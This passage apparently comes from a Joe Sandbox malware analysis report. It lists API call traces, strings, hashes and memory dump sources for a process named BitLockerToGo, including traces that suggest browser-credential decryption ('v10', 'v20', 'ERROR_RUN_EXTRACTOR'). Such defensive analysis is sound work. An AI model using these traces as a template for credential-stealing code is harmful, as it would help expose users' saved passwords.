                                                                                                                                                                • Opcode Fuzzy Hash: 963e0f66573318e3c07c1c873e6ae660b3f7d684175af05f15b9e2c67a0dab2b
                                                                                                                                                                • Instruction Fuzzy Hash: D901F170A001018FD6109BACE808A4572B4EF16328F040537E86A96E51F631E85ACD5A
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitProcess$DefaultLangUser
                                                                                                                                                                • String ID: *
                                                                                                                                                                • API String ID: 1494266314-163128923
                                                                                                                                                                • Opcode ID: 563ada9b8a7d25c97279038a99116ebb52e7632c38761dc2dacc4e6c37027522
                                                                                                                                                                • Instruction ID: f293224bf7becf9354525005f03aab327010c5c33c702c1ffe1c80295a341956
                                                                                                                                                                • Opcode Fuzzy Hash: 563ada9b8a7d25c97279038a99116ebb52e7632c38761dc2dacc4e6c37027522
                                                                                                                                                                • Instruction Fuzzy Hash: 99F03A35985209EFE350AFE0BA0DB6D7B70FB04702F048198F70A86284D7754A519B95
                                                                                                                                                                APIs
                                                                                                                                                                • memcmp.MSVCRT(?,v20,00000003), ref: 03009E2D
                                                                                                                                                                  • Part of subcall function 0301A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0301A7E6
                                                                                                                                                                  • Part of subcall function 03010A60: memset.MSVCRT ref: 03010C1C
                                                                                                                                                                  • Part of subcall function 03010A60: lstrcat.KERNEL32(?,00000000), ref: 03010C35
                                                                                                                                                                  • Part of subcall function 03010A60: lstrcat.KERNEL32(?,03020D7C), ref: 03010C47
                                                                                                                                                                  • Part of subcall function 03010A60: lstrcat.KERNEL32(?,00000000), ref: 03010C5D
                                                                                                                                                                  • Part of subcall function 03010A60: lstrcat.KERNEL32(?,03020D80), ref: 03010C6F
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                • memcmp.MSVCRT(?,v10,00000003), ref: 03009EAF
                                                                                                                                                                • memset.MSVCRT ref: 03009EE8
                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?), ref: 03009F41
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                                                                                                                                                • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                                                                                                                                                • API String ID: 1977917189-1096346117
                                                                                                                                                                • Opcode ID: 9f9eb4841cc7c24e6eb2a519d0599fb67cd0e3e8b8e0d4f0c772424c5b14a8d7
                                                                                                                                                                • Instruction ID: 731be13e693c3728232f91dc988bb398c19ae421cac699aae4806cf0987802e3
                                                                                                                                                                • Opcode Fuzzy Hash: 9f9eb4841cc7c24e6eb2a519d0599fb67cd0e3e8b8e0d4f0c772424c5b14a8d7
                                                                                                                                                                • Instruction Fuzzy Hash: A3612C75A02348EFDB28EFA4DD95FEE7775AF84300F008018E90A5F191DB746A1ACB90
                                                                                                                                                                APIs
                                                                                                                                                                • ?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6CCEB5B9
                                                                                                                                                                • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6CCEB5C5
                                                                                                                                                                • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6CCEB5DA
                                                                                                                                                                • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6CCEB5F4
                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 6CCEB605
                                                                                                                                                                • ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6CCEB61F
                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 6CCEB631
                                                                                                                                                                • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CCEB655
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1276798925-0
                                                                                                                                                                • Opcode ID: 4fbc751e000633f7d86b0101efe120cbce60bafe5471bc5620a690fe5255f19e
                                                                                                                                                                • Instruction ID: bf2b29e56037835616dc2362003039c7617530f5253cba23a8fead8ba3a09625
                                                                                                                                                                • Opcode Fuzzy Hash: 4fbc751e000633f7d86b0101efe120cbce60bafe5471bc5620a690fe5255f19e
                                                                                                                                                                • Instruction Fuzzy Hash: D8319371B00205CFCB00DFA9D8689AEB7F5FF8A364F140559D92697740EB71A806CFA6
                                                                                                                                                                APIs
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 6CCC1D0F
                                                                                                                                                                • AcquireSRWLockExclusive.KERNEL32(?,?,6CCC1BE3,?,?,6CCC1D96,00000000), ref: 6CCC1D18
                                                                                                                                                                • ReleaseSRWLockExclusive.KERNEL32(?,?,6CCC1BE3,?,?,6CCC1D96,00000000), ref: 6CCC1D4C
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 6CCC1DB7
                                                                                                                                                                • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CCC1DC0
                                                                                                                                                                • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CCC1DDA
                                                                                                                                                                  • Part of subcall function 6CCC1EF0: GetCurrentThreadId.KERNEL32 ref: 6CCC1F03
                                                                                                                                                                  • Part of subcall function 6CCC1EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6CCC1DF2,00000000,00000000), ref: 6CCC1F0C
                                                                                                                                                                  • Part of subcall function 6CCC1EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6CCC1F20
                                                                                                                                                                • moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6CCC1DF4
                                                                                                                                                                  • Part of subcall function 6CC8CA10: malloc.MOZGLUE(?), ref: 6CC8CA26
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1880959753-0
                                                                                                                                                                • Opcode ID: e98d4a25b97d4fc26c691d82a6bcac6465df6541f5ebb9fe0062c58e262420b1
                                                                                                                                                                • Instruction ID: 2f9770c5e59db139b1dc0b8e409403cf64e3c2dc6a345f3d5942df78affec622
                                                                                                                                                                • Opcode Fuzzy Hash: e98d4a25b97d4fc26c691d82a6bcac6465df6541f5ebb9fe0062c58e262420b1
                                                                                                                                                                • Instruction Fuzzy Hash: 644178B5200705AFCB10DF29D498A56BBF9FF89314F10446EE96A87B41DB31F854CB91
                                                                                                                                                                APIs
                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CCB84F3
                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CCB850A
                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CCB851E
                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CCB855B
                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CCB856F
                                                                                                                                                                • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CCB85AC
                                                                                                                                                                  • Part of subcall function 6CCB7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CCB85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CCB767F
                                                                                                                                                                  • Part of subcall function 6CCB7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CCB85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CCB7693
                                                                                                                                                                  • Part of subcall function 6CCB7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6CCB85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CCB76A7
                                                                                                                                                                • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CCB85B2
                                                                                                                                                                  • Part of subcall function 6CC95E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CC95EDB
                                                                                                                                                                  • Part of subcall function 6CC95E90: memset.VCRUNTIME140(6CCD7765,000000E5,55CCCCCC), ref: 6CC95F27
                                                                                                                                                                  • Part of subcall function 6CC95E90: LeaveCriticalSection.KERNEL32(?), ref: 6CC95FB2
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2666944752-0
                                                                                                                                                                • Opcode ID: 20369d7a3d34acdf44b04962c32d87e27f03c07d0c641b534c06906a1e001966
                                                                                                                                                                • Instruction ID: 6eb3052007be87ac745b6f1fcd556a0e17188a6ab0be68c4dc357c3c196dd3c4
                                                                                                                                                                • Opcode Fuzzy Hash: 20369d7a3d34acdf44b04962c32d87e27f03c07d0c641b534c06906a1e001966
                                                                                                                                                                • Instruction Fuzzy Hash: 70215A743006029FEB24DF68D888E5AB7B9AF8430DF24482DE55B93B41EB35F949CB51
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 6CCACBE8: GetCurrentProcess.KERNEL32(?,6CC731A7), ref: 6CCACBF1
                                                                                                                                                                  • Part of subcall function 6CCACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC731A7), ref: 6CCACBFA
                                                                                                                                                                  • Part of subcall function 6CCB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC84A68), ref: 6CCB945E
                                                                                                                                                                  • Part of subcall function 6CCB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CCB9470
                                                                                                                                                                  • Part of subcall function 6CCB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CCB9482
                                                                                                                                                                  • Part of subcall function 6CCB9420: __Init_thread_footer.LIBCMT ref: 6CCB949F
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 6CCBF619
                                                                                                                                                                • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6CCBF598), ref: 6CCBF621
                                                                                                                                                                  • Part of subcall function 6CCB94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CCB94EE
                                                                                                                                                                  • Part of subcall function 6CCB94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CCB9508
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 6CCBF637
                                                                                                                                                                • AcquireSRWLockExclusive.KERNEL32(6CCFF4B8,?,?,00000000,?,6CCBF598), ref: 6CCBF645
                                                                                                                                                                • ReleaseSRWLockExclusive.KERNEL32(6CCFF4B8,?,?,00000000,?,6CCBF598), ref: 6CCBF663
                                                                                                                                                                Strings
                                                                                                                                                                • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6CCBF62A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                                                                                • API String ID: 1579816589-753366533
                                                                                                                                                                • Opcode ID: 46af2829a072e9028d12a8ccf39b940973a69b400f3e66c96e73f648b868db04
                                                                                                                                                                • Instruction ID: 032e9b5fc742b667971b13f0b795ca2720aaab95dd533576493ecb1e83c1ab1e
                                                                                                                                                                • Opcode Fuzzy Hash: 46af2829a072e9028d12a8ccf39b940973a69b400f3e66c96e73f648b868db04
                                                                                                                                                                • Instruction Fuzzy Hash: C8110A39300205AFDB04AF98E958DD5BBB9FF86358B100016EA1593F01EB72EC25CBB1
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 6CCAAB89: EnterCriticalSection.KERNEL32(6CCFE370,?,?,?,6CC734DE,6CCFF6CC,?,?,?,?,?,?,?,6CC73284), ref: 6CCAAB94
                                                                                                                                                                  • Part of subcall function 6CCAAB89: LeaveCriticalSection.KERNEL32(6CCFE370,?,6CC734DE,6CCFF6CC,?,?,?,?,?,?,?,6CC73284,?,?,6CC956F6), ref: 6CCAABD1
                                                                                                                                                                • LoadLibraryW.KERNEL32(combase.dll,00000000,?,6CCAD9F0,00000000), ref: 6CC80F1D
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6CC80F3C
                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 6CC80F50
                                                                                                                                                                • FreeLibrary.KERNEL32(?,6CCAD9F0,00000000), ref: 6CC80F86
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                                                                                • String ID: CoInitializeEx$combase.dll
                                                                                                                                                                • API String ID: 4190559335-2063391169
                                                                                                                                                                • Opcode ID: 4f338bfe3394754b655436f1b7c8527c8fc76b5ece83954da9da05e5476266f4
                                                                                                                                                                • Instruction ID: 4f64f5be47b10cf496dd1943bf633ef19062e5564d08cf9ad56f5a50472ce652
                                                                                                                                                                • Opcode Fuzzy Hash: 4f338bfe3394754b655436f1b7c8527c8fc76b5ece83954da9da05e5476266f4
                                                                                                                                                                • Instruction Fuzzy Hash: DD1182747072419FDF01CF59E958A473BF5FF8B32AF008229E92596B40F730A405CA55
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 6CCB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC84A68), ref: 6CCB945E
                                                                                                                                                                  • Part of subcall function 6CCB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CCB9470
                                                                                                                                                                  • Part of subcall function 6CCB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CCB9482
                                                                                                                                                                  • Part of subcall function 6CCB9420: __Init_thread_footer.LIBCMT ref: 6CCB949F
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 6CCBF559
                                                                                                                                                                • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CCBF561
                                                                                                                                                                  • Part of subcall function 6CCB94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CCB94EE
                                                                                                                                                                  • Part of subcall function 6CCB94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CCB9508
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 6CCBF577
                                                                                                                                                                • AcquireSRWLockExclusive.KERNEL32(6CCFF4B8), ref: 6CCBF585
                                                                                                                                                                • ReleaseSRWLockExclusive.KERNEL32(6CCFF4B8), ref: 6CCBF5A3
                                                                                                                                                                Strings
                                                                                                                                                                • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6CCBF56A
                                                                                                                                                                • [I %d/%d] profiler_pause_sampling, xrefs: 6CCBF3A8
                                                                                                                                                                • [I %d/%d] profiler_resume, xrefs: 6CCBF239
                                                                                                                                                                • [I %d/%d] profiler_resume_sampling, xrefs: 6CCBF499
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                                                                                                                • API String ID: 2848912005-2840072211
                                                                                                                                                                • Opcode ID: 5b1b980c0781cfac563de04143dcf3d035f1fd7b3c24d854bf8ab0e4b92b2dd1
                                                                                                                                                                • Instruction ID: e625c04c99673368ee856d087b27bc267c907806600bc70d0342d22a61d2544d
                                                                                                                                                                • Opcode Fuzzy Hash: 5b1b980c0781cfac563de04143dcf3d035f1fd7b3c24d854bf8ab0e4b92b2dd1
                                                                                                                                                                • Instruction Fuzzy Hash: AAF05479600204AFEA006FA5A858A5ABBBDEF8629DF000055FA6593B01EB758805CB75
                                                                                                                                                                APIs
                                                                                                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6CCACFAE,?,?,?,6CC731A7), ref: 6CCB05FB
                                                                                                                                                                • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6CCACFAE,?,?,?,6CC731A7), ref: 6CCB0616
                                                                                                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6CC731A7), ref: 6CCB061C
                                                                                                                                                                • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6CC731A7), ref: 6CCB0627
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _writestrlen
                                                                                                                                                                • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                • API String ID: 2723441310-2186867486
                                                                                                                                                                • Opcode ID: 990f9f228eb84fb63a156086ddb4d723d40548909abe9859e8adefc2366df46d
                                                                                                                                                                • Instruction ID: 9b52f6d946ef8114332b680540075382e2cfdbcb19af2c57f8b84bb75f460d62
                                                                                                                                                                • Opcode Fuzzy Hash: 990f9f228eb84fb63a156086ddb4d723d40548909abe9859e8adefc2366df46d
                                                                                                                                                                • Instruction Fuzzy Hash: C5E08CE2A0101037F514225ABC86DFB7A1CDBCA134F08003AFD1D82301FA4AAD1A51F6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
